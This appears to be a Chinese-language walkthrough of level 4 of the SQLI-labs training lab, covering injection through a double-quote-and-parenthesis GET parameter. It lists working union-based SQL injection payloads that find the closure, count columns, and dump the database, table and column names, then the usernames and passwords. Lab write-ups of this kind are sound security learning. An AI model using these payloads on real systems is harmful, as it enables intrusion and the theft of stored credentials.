SQLI-labs-第四关

知识点:get双引号(")和括号注入

思路:

SQLI-labs-第四关_第1张图片

SQLI-labs-第四关_第2张图片

1、判断注入点

首先,输入?id=1 --+,看看正常的回显状态

SQLI-labs-第四关_第3张图片

接着输入?id=1' --+,结果还是正常回显,说明这里不存在单引号问题

SQLI-labs-第四关_第4张图片

试试双引号,这里爆出了sql语句错误,根据错误信息,还有括号闭合问题

SQLI-labs-第四关_第5张图片

输入?id=1") and 1=1 --+,结果回显正常

SQLI-labs-第四关_第6张图片

输入?id=1") and 1=2 --+,结果没有回显出来,也没有爆出错误,说明这里存在双引号和括号闭合问题的sql注入

SQLI-labs-第四关_第7张图片

2、判断当前表的字段数

?id=1") order by 3 --+  ,回显正常

SQLI-labs-第四关_第8张图片

?id=1") order by 4 --+  报错,说明当前表的字段数只有3个

SQLI-labs-第四关_第9张图片

3、判断数据的回显位置

?id=1")  and 1=2 union select 1,2,3 --+

SQLI-labs-第四关_第10张图片

4、爆库名

?id=1")  and 1=2 union select 1,2,database() --+

SQLI-labs-第四关_第11张图片

5、爆表名

/?id=1")  and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+

SQLI-labs-第四关_第12张图片

6、爆字段名

?id=1")  and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' --+

SQLI-labs-第四关_第13张图片

7、爆值

?id=1")  and 1=2 union select 1,2,concat_ws(',',id,username,password) from security.users limit 0,1 --+

SQLI-labs-第四关_第14张图片

通过修改表名和limit的值就可以爆出全部的值了


这篇文章就写到这里了,哪里不好,欢迎批评指正

你可能感兴趣的:(渗透学习之路,数据库,web安全)